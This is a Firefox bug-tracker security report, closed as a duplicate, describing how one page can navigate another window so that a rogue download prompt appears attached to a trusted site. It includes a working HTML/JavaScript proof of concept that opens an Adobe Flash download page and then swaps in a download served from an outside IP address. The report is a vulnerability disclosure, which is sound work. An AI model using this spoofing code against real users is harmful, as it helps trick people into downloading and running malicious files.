Browser Navigation Download Trick

RESOLVED DUPLICATE of bug 741050

Status

()

Firefox
Security
--
critical
RESOLVED DUPLICATE of bug 741050
3 years ago
3 years ago

People

(Reporter: ashesh1708, Unassigned)

Tracking

36 Branch
x86_64
Windows 8.1
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

3 years ago
It is an important and little-known property of web browsers that one
document can always navigate other, non-same-origin windows to
arbitrary URLs. Perhaps more interestingly, you can also navigate
third-party documents to resources served with Content-Disposition:
attachment, in which case, you get the original contents of the
address bar, plus a rogue download prompt attached to an unsuspecting
page that never wanted you to download that file.

PoC:
http://lcamtuf.coredump.cx/fldl/
 
==========
<input type=submit onclick="doit()" value="Click me. I like to be clicked.">
<script>
var w;
var once;
 
function doit() {
 
  if (navigator.userAgent.indexOf('MSIE') != -1)
    w = window.open('page2.html', 'foo');
  else
    w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');
 
  setTimeout(donext, 4500);
 
}
 
function donext() {
  window.open('http://199.58.85.40/download2.cgi', 'foo');
  if (once != true) setTimeout(donext, 5000);
  once = true;
}
</script>



=========================================

redictably but not very intuitively, the attacker may initiate such cross-domain navigation not only to point the targeted window to a well-formed HTML document - but also to a resource served with the Content-Disposition: attachment header. In this scenario, the address bar of the targeted window will not be updated at all - but a rogue download prompt will appear on the screen, attached to the targeted document.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 741050
You need to log in before you can comment on or make changes to this bug.